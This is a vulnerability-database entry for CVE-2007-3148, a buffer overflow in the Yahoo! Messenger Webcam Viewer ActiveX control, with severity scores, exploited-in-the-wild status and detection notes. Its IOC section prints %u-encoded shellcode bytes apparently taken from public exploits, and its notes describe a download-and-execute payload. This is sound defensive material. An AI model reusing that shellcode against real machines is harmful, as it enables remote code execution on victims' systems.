CVE-2007-3148
published 2007-06-11


Priority: P267 · critical · 9.3 (CVSS 2.0)
CVSS vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
ITW EXPLOIT · VulnCheck KEV: Exploited in the wild
EPSS: 12.34% (95.7th percentile)
Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.

Affected (6 ranges)

Vendor | Product   | Version range | Fixed in
yahoo  | messenger |               |
yahoo  | messenger |               |
yahoo  | messenger |               |
yahoo  | messenger |               |
yahoo  | messenger |               |
yahoo  | messenger |               |

Detection & IOCs (extracted from sources)

filename: ywcvwr.dll
command: receive
bytes:
%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC%uCC4A%uD0FF
  • The vulnerable ActiveX control is ywcvwr.dll version 2.0.1.4; detect instantiation of this control in browser contexts or presence of the DLL on disk.
  • Exploit triggers via the 'receive' method of the ActiveX control with an overly long 'server' property value; monitor ActiveX method calls to ywcvwr.dll's receive method with large argument strings.
  • The exploit targets Yahoo! Messenger version 8.1.0.249 with ywcvwr.dll 2.0.1.4 specifically; other versions may not be vulnerable or may require different offsets.
  • Exploit 4043 notes a bug fix over a prior version ('Fixed bug in last post'), indicating the shellcode/heap-spray offsets were revised; earlier variants may differ.
  • The download-and-execute shellcode (exploit 4052) requires a valid HTTP or FTP URL to a remote payload; the URL is embedded at runtime and will vary per attacker infrastructure.

CVSS provenance

nvd · v2.0 · 9.3 CRITICAL · AV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck · 9.3 CRITICAL